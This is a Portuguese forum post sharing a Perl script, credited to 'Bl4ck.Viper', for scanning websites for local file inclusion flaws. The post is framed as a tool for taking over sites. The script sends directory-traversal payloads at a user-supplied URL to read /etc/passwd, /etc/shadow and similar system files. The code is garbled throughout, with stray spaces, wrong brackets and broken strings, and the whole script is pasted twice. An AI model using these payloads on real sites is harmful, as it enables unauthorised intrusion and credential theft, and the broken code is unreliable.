Pra quem gosta de ownar sites com falhas em LFI vo mandar um script em PERL para scann
#! / usr / bin / perl
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
# LFI Scanner Full Version
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
#
#
#
# Info:
#
# Código: Perl
# Contato: Bl4ck.Viper
# Email: Bl4ck.Viper Gmail.Com @ & # @ l4ck.Viper Yahoo.Com
#
#
# Descrição:
#
# Local File Include (LFI) Scanner Full & Priv8 Version
# licença Linux e Windows
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
use HTTP:: Request;
use LWP:: UserAgent;
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ t \ t LFI Scanner Full & Priv8 Version \ n";
print "\ t \ t \ t Coded By Bl4ck.Viper \ n";
print "\ t \ t \ t Made In Azarbycan \ n";
print "\ t \ t Versão em Inglês \ n";
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ n \ n";
print "tPress \ [Enter] para iniciar Scanner ...";
$ esu = <>;
print "\ n \ n";
print "\ t Insert Target (ex: [url = http://www.site.com/index.php?page =] http://www.site.com/index.php?page = [/ url]) \ n ";
print "\ t-alvo:";
$ host = ;
chomp ($ host);
if ($ host! ~ / http: \ / \ / /) ($ host = "http:// $ host";
print "\ n \ n";
print "\ t *-*-*-*-*-* TRABALHO EM ANDAMENTO *-*-*-*-*-* \ n";
print "\ n \ n";
@ LFI = ('../ etc / passwd ',
'../../ etc / passwd ',
'../../../ etc / passwd ',
'../../../../ etc / passwd ',
'../../../../../ etc / passwd ',
'../../../../../../ etc / passwd ',
'../../../../../../../ etc / passwd ',
'../../../../../../../../ etc / passwd ',
'../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../../.. etc / passwd ',
'.. / etc / shadow',
'../../ etc / shadow ',
'../../../ etc / shadow ',
'../../../../ etc / shadow ',
'../../../../../ etc / shadow ',
'../../../../../../ etc / shadow ',
'../../../../../../../ etc / shadow ',
'../../../../../../../../ etc / shadow ',
'../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../../ etc / shadow ',
'.. / etc / group',
'../../ etc / group ',
'../../../ etc / group ',
'../../../../ etc / group ',
'../../../../../ etc / group ',
'../../../../../../ etc / group ',
'../../../../../../../ etc / group ',
'../../../../../../../../ etc / group ',
'../../../../../../../../../ etc / group ',
'../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../../ etc / group ',
'.. / etc / security / group',
'../../ etc / security / group ',
'../../../ etc / security / group ',
'../../../../ etc / security / group ',
'../../../../../ etc / security / group ',
'../../../../../../ etc / security / group ',
'../../../../../../../ etc / security / group ',
'../../../../../../../../ etc / security / group ',
'../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../../ etc / security / group ',
'.. / etc / security / passwd',
'../../ etc / security / passwd ',
'../../../ etc / security / passwd ',
'../../../../ etc / security / passwd ',
'../../../../../ etc / security / passwd ',
'../../../../../../ etc / security / passwd ',
'../../../../../../../ etc / security / passwd ',
'../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../../ etc / security / passwd ',
'.. / etc / security / user /',
'../../ etc / security / user ',
'../../../ etc / security / user ',
'../../../../ etc / security / user ',
'../../../../../ etc / security / user ',
'../../../../../../ etc / security / user ',
'../../../../../../../ etc / security / user ',
'../../../../../../../../ etc / security / user ',
'../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../../ etc / security / user ');
foreach $ scan (@ LFI) (
$ url = $ host. $ scan;
$ request = HTTP:: Request-> new (GET => $ url);
$ useragent = LWP:: UserAgent-> new ();
$ response = $ useragent-> request ($ request);
if ($ response-> is_success & & $ response-> content = ~ / root: x: /) ($ msg = Vulnerável
else ($ msg = "Não encontrado"
print "$ varredura ..........[$ msg] \ n";
)
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
# LFI Scanner Full Version
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
#
#
#
# Info:
#
# Código: Perl
# Contato: Bl4ck.Viper
# Email: Bl4ck.Viper Gmail.Com @ & # @ l4ck.Viper Yahoo.Com
#
#
# Descrição:
#
# Local File Include (LFI) Scanner Full & Priv8 Version
# licença Linux e Windows
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
use HTTP:: Request;
use LWP:: UserAgent;
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ t \ t LFI Scanner Full & Priv8 Version \ n";
print "\ t \ t \ t Coded By Bl4ck.Viper \ n";
print "\ t \ t \ t Made In Azarbycan \ n";
print "\ t \ t Versão em Inglês \ n";
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ n \ n";
print "tPress \ [Enter] para iniciar Scanner ...";
$ esu = <>;
print "\ n \ n";
print "\ t Insert Target (ex: [url = http://www.site.com/index.php?page =] http://www.site.com/index.php?page = [/ url]) \ n ";
print "\ t-alvo:";
$ host = ;
chomp ($ host);
if ($ host! ~ / http: \ / \ / /) ($ host = "http:// $ host";
print "\ n \ n";
print "\ t *-*-*-*-*-* TRABALHO EM ANDAMENTO *-*-*-*-*-* \ n";
print "\ n \ n";
@ LFI = ('../ etc / passwd ',
'../../ etc / passwd ',
'../../../ etc / passwd ',
'../../../../ etc / passwd ',
'../../../../../ etc / passwd ',
'../../../../../../ etc / passwd ',
'../../../../../../../ etc / passwd ',
'../../../../../../../../ etc / passwd ',
'../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../../.. etc / passwd ',
'.. / etc / shadow',
'../../ etc / shadow ',
'../../../ etc / shadow ',
'../../../../ etc / shadow ',
'../../../../../ etc / shadow ',
'../../../../../../ etc / shadow ',
'../../../../../../../ etc / shadow ',
'../../../../../../../../ etc / shadow ',
'../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../../ etc / shadow ',
'.. / etc / group',
'../../ etc / group ',
'../../../ etc / group ',
'../../../../ etc / group ',
'../../../../../ etc / group ',
'../../../../../../ etc / group ',
'../../../../../../../ etc / group ',
'../../../../../../../../ etc / group ',
'../../../../../../../../../ etc / group ',
'../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../../ etc / group ',
'.. / etc / security / group',
'../../ etc / security / group ',
'../../../ etc / security / group ',
'../../../../ etc / security / group ',
'../../../../../ etc / security / group ',
'../../../../../../ etc / security / group ',
'../../../../../../../ etc / security / group ',
'../../../../../../../../ etc / security / group ',
'../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../../ etc / security / group ',
'.. / etc / security / passwd',
'../../ etc / security / passwd ',
'../../../ etc / security / passwd ',
'../../../../ etc / security / passwd ',
'../../../../../ etc / security / passwd ',
'../../../../../../ etc / security / passwd ',
'../../../../../../../ etc / security / passwd ',
'../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../../ etc / security / passwd ',
'.. / etc / security / user /',
'../../ etc / security / user ',
'../../../ etc / security / user ',
'../../../../ etc / security / user ',
'../../../../../ etc / security / user ',
'../../../../../../ etc / security / user ',
'../../../../../../../ etc / security / user ',
'../../../../../../../../ etc / security / user ',
'../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../../ etc / security / user ');
foreach $ scan (@ LFI) (
$ url = $ host. $ scan;
$ request = HTTP:: Request-> new (GET => $ url);
$ useragent = LWP:: UserAgent-> new ();
$ response = $ useragent-> request ($ request);
if ($ response-> is_success & & $ response-> content = ~ / root: x: /) ($ msg = Vulnerável
else ($ msg = "Não encontrado"
print "$ varredura ..........[$ msg] \ n";
)